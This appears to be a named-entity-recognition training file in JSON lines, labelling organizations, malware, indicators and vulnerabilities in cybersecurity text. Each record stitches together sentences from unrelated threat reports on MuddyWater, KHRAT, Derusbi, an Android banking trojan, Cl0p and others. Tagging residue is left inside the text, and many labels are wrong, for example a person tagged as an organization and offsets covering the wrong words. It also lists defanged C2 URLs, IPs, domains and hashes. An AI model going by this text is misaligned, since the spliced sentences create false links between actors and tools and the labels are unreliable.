However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 441, "end": 508, "label": "Vulnerability"}]} {"text": "However , the C2 can send an updated list . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 . The malware then proceeds to beacon to a configured remote server of cswksfwq.kfesv.xyz on TCP port 8080 . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": [{"start": 44, "end": 54, "label": "Organization"}, {"start": 82, "end": 94, "label": "Organization"}, {"start": 202, "end": 220, "label": "Indicator"}, {"start": 224, "end": 227, "label": "Indicator"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 283, "end": 311, "label": "Organization"}, {"start": 328, "end": 351, "label": "Organization"}]} {"text": "List of packages received from the C2 adminNumber : Setup of the admin phone number . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . Upon successful connection , the malware transmits victim information such as : hostname , IP address , Language Pack along with other operating system information . \u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 153, "end": 165, "label": "System"}, {"start": 170, "end": 180, "label": "System"}, {"start": 430, "end": 446, "label": "Vulnerability"}, {"start": 451, "end": 467, "label": "Vulnerability"}]} {"text": "In our case , the administrator phone number belongs to a mobile network in Australia . 
Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The data transmitted are XOR encoded . The first 6 Variables numbered lines were nt used anywhere in the code .", "spans": [{"start": 124, "end": 129, "label": "Organization"}, {"start": 208, "end": 219, "label": "Organization"}, {"start": 222, "end": 229, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 250, "end": 268, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 334, "end": 400, "label": "Malware"}]} {"text": "Phone number for administration changeServer : At this point , the malware changes the C2 to a new host , even though the API and communication protocol continues to be the same . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . The malware supports the following capabilities : Terminate specific process\u3001Enumerate processes\u3001Upload file\u3001Download file\u3001Delete file\u3001List folder contents\u3001Enumerate storage volumes\u3001Execute a command\u3001Reverse shell\u3001Take a screenshot . Conducted for commercial or financial purposes , corporate espionage involves", "spans": [{"start": 247, "end": 259, "label": "System"}, {"start": 264, "end": 274, "label": "System"}]} {"text": "Change server request The URL 's for the new server is obfuscated , preventing easy network identification . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia . KHRAT : SHA256 : aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 . 
A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 172, "end": 195, "label": "System"}, {"start": 203, "end": 209, "label": "System"}, {"start": 268, "end": 273, "label": "Malware"}, {"start": 285, "end": 344, "label": "Indicator"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 433, "end": 441, "label": "Malware"}, {"start": 460, "end": 502, "label": "Vulnerability"}]} {"text": "changeActivity : This command will set up the webview to overlay any of the target activities . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . KHRAT : Compile Date and Time : 2018-05-02 05:22:23 PM . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": [{"start": 112, "end": 163, "label": "Organization"}, {"start": 166, "end": 170, "label": "Organization"}, {"start": 206, "end": 224, "label": "Malware"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 255, "end": 272, "label": "Malware"}, {"start": 279, "end": 289, "label": "System"}, {"start": 326, "end": 331, "label": "Organization"}, {"start": 402, "end": 407, "label": "Organization"}, {"start": 489, "end": 494, "label": "Malware"}, {"start": 595, "end": 603, "label": "Organization"}]} {"text": "changeActivity command The webview injects are not hosted on the C2 , they are hosted on a completely different server . 
From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East . KHRAT : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": [{"start": 163, "end": 201, "label": "Organization"}, {"start": 216, "end": 225, "label": "Organization"}, {"start": 381, "end": 386, "label": "Malware"}, {"start": 419, "end": 422, "label": "System"}, {"start": 442, "end": 452, "label": "System"}, {"start": 455, "end": 546, "label": "Malware"}]} {"text": "params : This command allows the malicious operator to change configuration parameters in the malware . MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . KHRAT : File Name : 8081.dll . The usage of the h and m parameters and its values local and net are very similar to arguments used by Conti .", "spans": [{"start": 104, "end": 114, "label": "Organization"}, {"start": 172, "end": 188, "label": "Organization"}, {"start": 221, "end": 226, "label": "Malware"}, {"start": 241, "end": 249, "label": "Indicator"}, {"start": 355, "end": 360, "label": "Organization"}]} {"text": "During this stage of the activation cycle , the malware increases the beaconing time to avoid detection . This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . 
Rmcmd : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": [{"start": 111, "end": 116, "label": "Organization"}, {"start": 174, "end": 190, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 284, "end": 292, "label": "Organization"}, {"start": 378, "end": 395, "label": "Malware"}]} {"text": "Command to change the beaconing changeArchive : The final command of the activation cycle is the download of an archive . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS . When the DLL is initially loaded , it dynamically resolves and imports additional modules ( DLLs \u2019 ) needed . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": [{"start": 185, "end": 193, "label": "System"}, {"start": 206, "end": 216, "label": "System"}, {"start": 228, "end": 231, "label": "System"}, {"start": 311, "end": 315, "label": "System"}, {"start": 386, "end": 397, "label": "Malware"}, {"start": 402, "end": 416, "label": "Malware"}]} {"text": "This archive is stored in the same host has the webviews . The group is known for espionage campaigns in the Middle East . Once loaded and the export entry of Rmcmd is called , it creates a Windows B-TOOL S-OS mutex named gkdflbmdfk . By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 222, "end": 232, "label": "System"}]} {"text": "The archive is a ZIP containing several files , which is protected with a password . 
The threat group in this recently observed campaign \u2013 TEMP.Zagros \u2013 weaponized their malware using the following techniques . This ensures that only one copy of the malware is running at a time . The standard states that the purpose of threat intelligence should be to \u201c provide awareness of the organization 's threat environment so that the appropriate mitigation actions can be taken . \u201d", "spans": [{"start": 89, "end": 101, "label": "Organization"}]} {"text": "Change archive command After this activation cycle , the malware will start the collection of information activities and dissemination . The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro . It then begins to beacon to a configured domain of connect.bafunpda.xyz on TCP port 8081 . There are currently five behavioral - based rules defined by Apple .", "spans": [{"start": 214, "end": 224, "label": "Organization"}, {"start": 251, "end": 269, "label": "System"}, {"start": 283, "end": 292, "label": "System"}, {"start": 293, "end": 304, "label": "System"}, {"start": 364, "end": 384, "label": "Indicator"}, {"start": 388, "end": 391, "label": "Indicator"}, {"start": 465, "end": 470, "label": "Organization"}]} {"text": "Malicious activity Once the activation cycle ends , the trojan will start its malicious activities . The threat group in this recently observed campaign a TEMP.Zagros a weaponized their malware using the following techniques . The malware collects and transmits data from the host , such as hostname and is XOR encoded with the first byte of the network traffic being the key . 
The SCIL - API interface in MicroSCADA has been disabled - by - default since the release of MicroSCADA 9.4 in 2014 .", "spans": [{"start": 105, "end": 117, "label": "Organization"}, {"start": 382, "end": 402, "label": "System"}, {"start": 406, "end": 416, "label": "System"}, {"start": 471, "end": 485, "label": "System"}]} {"text": "These activities depend on the device configuration . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Reverse Shell : The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": [{"start": 114, "end": 137, "label": "Malware"}, {"start": 225, "end": 254, "label": "Malware"}, {"start": 257, "end": 270, "label": "System"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 315, "end": 417, "label": "Indicator"}]} {"text": "Depending if the victim has any of the targeted applications , the anti-virus installed or geographic location , the malware can harvest credentials from the targeted applications , exfiltrate all personal information or simply use the victim 's device to send SMS to spread the trojan The malware deploys overlaying webviews to trick the user and eventually steal their login credentials . MuddyWater is a relatively new APT that surfaced in 2017 . The malware behavior and code share similarities with an older KHRAT sample from May 2018 . 
Otherwise , your data will be sold to DarkNetDarkWeb .", "spans": [{"start": 391, "end": 401, "label": "Organization"}, {"start": 422, "end": 425, "label": "Organization"}, {"start": 513, "end": 518, "label": "Malware"}, {"start": 542, "end": 579, "label": "Indicator"}, {"start": 580, "end": 594, "label": "System"}]} {"text": "These are adapted to the information the malicious operator wants to retrieve . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 . Sample ( SHA256 : bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 ) has the same export entry name and is also a reverse shell . An adversary may also destroy data backups that are vital to recovery after an incident .", "spans": [{"start": 110, "end": 121, "label": "Organization"}, {"start": 136, "end": 154, "label": "Organization"}, {"start": 159, "end": 170, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 274, "end": 338, "label": "Indicator"}, {"start": 386, "end": 399, "label": "System"}, {"start": 405, "end": 414, "label": "Organization"}]} {"text": "The first webview overlay is created on step 6 of the activation cycle . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 . The newer sample appears to be a re-write for optimization purposes with the underlying behavior remaining the same , reverse shell . 
First , the endpoint , used for informing clients about services offered by the remote Microsoft Exchange server , is accessed using an authenticated request to the frontend .", "spans": [{"start": 103, "end": 114, "label": "Organization"}, {"start": 129, "end": 147, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 182, "end": 187, "label": "Organization"}, {"start": 353, "end": 366, "label": "System"}]} {"text": "Pin request overlay This overlay asks the user to provide their PIN to unlock the mobile device , which is immediately exfiltrated to the C2 . Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise . Derusbi : SHA256 : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab . These individuals are targeting companies due to a difference in values .", "spans": [{"start": 203, "end": 231, "label": "Organization"}, {"start": 235, "end": 255, "label": "Organization"}, {"start": 282, "end": 297, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}, {"start": 354, "end": 413, "label": "Indicator"}]} {"text": "The last step of the activation cycle is the download of a password-protected ZIP file . The group mainly targets the telecommunications and IT services sectors . Derusbi : Compile Date and Time : 2012-09-14 09:20:12 AM . 
But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor \u2019s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as \u2018 one of the world \u2019s most unusual APT operations \u2019 due to : \u2022 Its use of a customized backdoor written in Assembler using \u2018 old school \u2019 virus writing techniques and habits \u2022 Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": [{"start": 93, "end": 98, "label": "Organization"}, {"start": 118, "end": 136, "label": "Organization"}, {"start": 141, "end": 160, "label": "Organization"}, {"start": 163, "end": 170, "label": "Malware"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 325, "end": 335, "label": "Malware"}, {"start": 353, "end": 375, "label": "Organization"}, {"start": 378, "end": 398, "label": "Organization"}, {"start": 401, "end": 453, "label": "Organization"}]} {"text": "This file contains all HTML , CSS and PNG files necessary to create overlays . However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US . Derusbi : File Type :P E32 executable ( DLL ) Intel 80386, for MS Windows . 
UNC2639 was first identified exploiting multiple zero - day vulnerabilities in Microsoft Exchange in early March 2021 .", "spans": [{"start": 93, "end": 98, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 239, "end": 242, "label": "System"}, {"start": 262, "end": 272, "label": "System"}, {"start": 275, "end": 282, "label": "Organization"}, {"start": 315, "end": 350, "label": "Vulnerability"}, {"start": 354, "end": 372, "label": "System"}]} {"text": "Talos found 189 logos from banks to cryptocurrency exchanges inside the archive , all of which could be targeted . The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . Derusbi : File Name : 32.dll . We have observed TANKTRAP being used with other disruptive tools including NEARMISS , SDELETE , PARTYTICKET , and CADDYWIPER .", "spans": [{"start": 119, "end": 124, "label": "Organization"}, {"start": 147, "end": 159, "label": "Organization"}, {"start": 225, "end": 232, "label": "Malware"}, {"start": 247, "end": 253, "label": "Indicator"}, {"start": 273, "end": 281, "label": "System"}, {"start": 282, "end": 380, "label": "Malware"}]} {"text": "The archive also contained all the necessary codes to target Australian financial institutions . The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . Derusbi is a backdoor B-MAL S-MAL Trojan E-MAL believed to be used among a small group of attackers , which includes the Rancor group . 
Open - source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org .", "spans": [{"start": 133, "end": 143, "label": "Organization"}, {"start": 208, "end": 215, "label": "Malware"}, {"start": 242, "end": 254, "label": "Malware"}, {"start": 329, "end": 335, "label": "Organization"}, {"start": 358, "end": 383, "label": "System"}]} {"text": "The overlays are activated by the malicious operator using the command changeActivity , as seen on step 5 of the activation cycle . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer . This particular sample is a loader that loads an encrypted payload for its functionality . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": [{"start": 132, "end": 142, "label": "Organization"}, {"start": 396, "end": 406, "label": "Organization"}, {"start": 470, "end": 474, "label": "Organization"}, {"start": 481, "end": 505, "label": "Organization"}]} {"text": "In this case , we can see that the HTML code of the overlay is stored in the C2 infrastructure . As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors . This DLL requires the loading executable to include a 32-byte key on the command line to be able to decrypt the embedded payload , which unfortunately we do not have . 
Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim \u2019s IT environment .", "spans": [{"start": 100, "end": 110, "label": "Organization"}, {"start": 139, "end": 149, "label": "System"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 234, "end": 237, "label": "System"}, {"start": 397, "end": 405, "label": "Organization"}, {"start": 478, "end": 488, "label": "Malware"}]} {"text": "However , since the archive that is downloaded into the device has all the necessary information and the malicious actor has access to the device via SMS , the malicious operator can keep its activity even without the C2 infrastructure . In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater . Even though we don\u2019t have the decryption key or loader , we have uncovered some interesting artifacts . Those desiring to steal payment card data typically install malware on point of sale systems POS with the intent of stealing magnetic stripe data .", "spans": [{"start": 254, "end": 265, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}]} {"text": "Infrastructure The infrastructure supporting this malware is rather complex . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . If the module that loads the sample is named myapp.exe the module will exit Once loaded , it sleeps for six seconds . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 92, "end": 103, "label": "Organization"}, {"start": 137, "end": 156, "label": "Malware"}, {"start": 243, "end": 252, "label": "Indicator"}, {"start": 462, "end": 492, "label": "Indicator"}]} {"text": "It is clear that on all stages there are at least two layers . 
In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . Looks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": [{"start": 77, "end": 88, "label": "Organization"}, {"start": 122, "end": 141, "label": "Malware"}, {"start": 195, "end": 202, "label": "System"}, {"start": 214, "end": 257, "label": "Indicator"}, {"start": 282, "end": 307, "label": "Organization"}, {"start": 333, "end": 337, "label": "Organization"}, {"start": 366, "end": 373, "label": "Organization"}]} {"text": "The infrastructure has several layers , although not being very dynamic , still has several layers each one providing some level of protection . Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . Looks for a Windows device named \\Device\\acpi_010221 . n July 2019 , we discovered an interesting VBScript named Chrome.vbs ( SHA256 : 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 ) associated with the Rancor group . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month \u2019s most active ransomware gang .", "spans": [{"start": 238, "end": 248, "label": "Organization"}, {"start": 354, "end": 361, "label": "System"}, {"start": 440, "end": 448, "label": "System"}, {"start": 455, "end": 465, "label": "Indicator"}, {"start": 477, "end": 541, "label": "Indicator"}, {"start": 564, "end": 570, "label": "Organization"}, {"start": 624, "end": 628, "label": "Organization"}, {"start": 676, "end": 683, "label": "Organization"}]} {"text": "All the IP addresses belong to the same company Hetzner , an IP-hosting firm in Germany . 
We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. . This particular VBScript payload beacons to domain bafunpda.xyz , which is also used by the KHRAT S-MAL Trojan E-MAL listed above in Table 2 . COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named \u201c Solar Polygon \u201d ( Figure 2 ) .", "spans": [{"start": 48, "end": 55, "label": "Organization"}, {"start": 114, "end": 119, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 166, "end": 183, "label": "Organization"}, {"start": 186, "end": 203, "label": "Organization"}, {"start": 217, "end": 241, "label": "Organization"}, {"start": 454, "end": 462, "label": "System"}, {"start": 489, "end": 501, "label": "Indicator"}, {"start": 530, "end": 541, "label": "Malware"}, {"start": 542, "end": 554, "label": "Malware"}, {"start": 581, "end": 593, "label": "Malware"}, {"start": 619, "end": 637, "label": "Organization"}, {"start": 720, "end": 732, "label": "Malware"}, {"start": 749, "end": 860, "label": "Indicator"}]} {"text": "COVERAGE Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere . This VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts . 
This third - stage backdoor is tracked as DOUBLEBACK .", "spans": [{"start": 9, "end": 14, "label": "Organization"}, {"start": 15, "end": 33, "label": "System"}, {"start": 45, "end": 67, "label": "System"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 325, "end": 333, "label": "System"}, {"start": 455, "end": 477, "label": "System"}, {"start": 492, "end": 502, "label": "System"}]} {"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques . The MOF file created by the VBScript is used as a persistence mechanism via Windows B-TOOL S-OS Management Instrumentation ( WMI ) Event Subscriptions . This CVE is in CISA 's Known Exploited Vulnerabilities Catalog Reference CISA 's BOD 22 - 01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements .", "spans": [{"start": 96, "end": 113, "label": "Organization"}, {"start": 317, "end": 325, "label": "System"}, {"start": 341, "end": 349, "label": "System"}, {"start": 438, "end": 441, "label": "System"}, {"start": 471, "end": 474, "label": "Vulnerability"}, {"start": 481, "end": 488, "label": "Organization"}, {"start": 489, "end": 520, "label": "Vulnerability"}, {"start": 539, "end": 546, "label": "Organization"}, {"start": 563, "end": 594, "label": "Vulnerability"}]} {"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater . 
MOF files are compiled scripts that describe Common Information Model ( CIM ) classes , which are compiled into the WMI repository . Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": [{"start": 36, "end": 60, "label": "System"}, {"start": 72, "end": 115, "label": "System"}, {"start": 132, "end": 141, "label": "System"}, {"start": 202, "end": 213, "label": "Organization"}, {"start": 349, "end": 372, "label": "Organization"}, {"start": 375, "end": 384, "label": "System"}, {"start": 420, "end": 444, "label": "System"}, {"start": 447, "end": 450, "label": "System"}, {"start": 491, "end": 494, "label": "System"}, {"start": 519, "end": 532, "label": "Organization"}, {"start": 537, "end": 551, "label": "System"}, {"start": 556, "end": 586, "label": "Organization"}, {"start": 641, "end": 653, "label": "Malware"}, {"start": 691, "end": 711, "label": "System"}]} {"text": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products . In this latest activity , BlackWater first added an obfuscated Visual Basic for Applications ( VBA ) script to establish persistence as a registry key . The technique is described by MITRE S-SECTEAM ATT&CK IDT1084 . The actors appear to target victims in Kuwait , as the ransom note demands payment in Kuwaiti dinar before translating that sum to its U.S. dollar equivalent in Bitcoin .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 169, "end": 198, "label": "System"}, {"start": 201, "end": 204, "label": "System"}, {"start": 289, "end": 319, "label": "System"}, {"start": 361, "end": 367, "label": "Organization"}]} {"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . 
Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater . This particular MOF file creates a timer event that is triggered every five seconds . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 281, "end": 304, "label": "Organization"}, {"start": 323, "end": 331, "label": "System"}, {"start": 539, "end": 569, "label": "Indicator"}]} {"text": "Open Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East . The DLL located in the Media registry key is a variant of the KHRAT Troja S-MALn E-MAL . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 143, "end": 153, "label": "Organization"}, {"start": 272, "end": 275, "label": "System"}, {"start": 291, "end": 305, "label": "System"}, {"start": 330, "end": 335, "label": "Malware"}, {"start": 336, "end": 354, "label": "Malware"}, {"start": 507, "end": 532, "label": "System"}]} {"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au.su Homevideo2-12l.ml videohosting1-5j.gq URLs hxxp : //88.99.227 [ . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) . 
It beacons to domain connect.bafunpda.xyz and attempts to connect to TCP port 4433 . They once attacked a game server to illicitly farm in - game currency ( \u201c gaming gold \u201d , which also has real - world value ) and stole source codes of online game projects .", "spans": [{"start": 64, "end": 81, "label": "Indicator"}, {"start": 82, "end": 101, "label": "Indicator"}, {"start": 107, "end": 129, "label": "Indicator"}, {"start": 173, "end": 202, "label": "System"}, {"start": 287, "end": 306, "label": "System"}, {"start": 378, "end": 383, "label": "Organization"}, {"start": 437, "end": 457, "label": "Indicator"}, {"start": 485, "end": 488, "label": "Indicator"}]} {"text": "] 26/html2/2018/GrafKey/new-inj-135-3-dark.html hxxp : //88.99.227 [ . Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations . This is the same domain used by the KHRAT S-MAL Trojan E-MAL . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 48, "end": 70, "label": "Indicator"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 238, "end": 249, "label": "Malware"}, {"start": 250, "end": 262, "label": "Malware"}]} {"text": "] 26/html2/arc92/au483x.zip hxxp : //94.130.106 [ . Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group . Rancor , a cyber espionage group active since at least 2017 , continues to conduct targeted attacks in Southeast Asia E-LOC and has been found using an undocumented , custom malware family \u2013 which we \u2019ve dubbed Dudell \u2013 to download a second stage payload once its malicious macro is executed . 
Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": [{"start": 28, "end": 51, "label": "Indicator"}, {"start": 93, "end": 103, "label": "Organization"}, {"start": 229, "end": 239, "label": "Organization"}, {"start": 240, "end": 258, "label": "Organization"}, {"start": 261, "end": 267, "label": "Organization"}, {"start": 472, "end": 478, "label": "Malware"}, {"start": 581, "end": 592, "label": "Organization"}, {"start": 673, "end": 689, "label": "Vulnerability"}]} {"text": "] 117:8080/api/v1/report/records.php hxxp : //88.99.227 [ . Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" . Additionally , Rancor is also using the Derusbi malware family to load a secondary payload once it infiltrates a target . PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": [{"start": 37, "end": 59, "label": "Indicator"}, {"start": 104, "end": 116, "label": "Organization"}, {"start": 123, "end": 142, "label": "System"}, {"start": 179, "end": 189, "label": "Organization"}, {"start": 306, "end": 312, "label": "Organization"}, {"start": 331, "end": 338, "label": "Malware"}, {"start": 413, "end": 434, "label": "Organization"}]} {"text": "] 26/html2/new-inj-135-3-white.html hxxp : //facebook-photos-au [ . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . Rancor : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . 
SecretsDump A publicly available tool that can perform various techniques to dump secrets from the remote machine without executing any agent .", "spans": [{"start": 36, "end": 67, "label": "Indicator"}, {"start": 95, "end": 108, "label": "System"}, {"start": 111, "end": 124, "label": "Vulnerability"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 234, "end": 298, "label": "Indicator"}, {"start": 301, "end": 312, "label": "System"}]} {"text": "] su/ChristinaMorrow hxxp : //homevideo2-12l [ . Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did . Rancor : AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 . Ashley Madison \u2019s parent company \u2014 Toronto - based Avid Life Media \u2014 filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": [{"start": 21, "end": 48, "label": "Indicator"}, {"start": 206, "end": 212, "label": "Organization"}, {"start": 215, "end": 279, "label": "Indicator"}, {"start": 282, "end": 314, "label": "Organization"}, {"start": 333, "end": 348, "label": "Organization"}, {"start": 440, "end": 455, "label": "Organization"}]} {"text": "] ml/mms3/download_3.php IP addresses 78.46.201.36 88.99.170.84 88.99.227.26 94.130.106.117 88.99.174.200 88.99.189.31 Hash 369fcf48c1eb982088c22f86672add10cae967af82613bee6fb8a3669603dc48 b2d4fcf03c7a8bf135fbd3073bea450e2e6661ad8ef2ab2058a3c04f81fc3f3e The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China . Rancor : 0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E . 
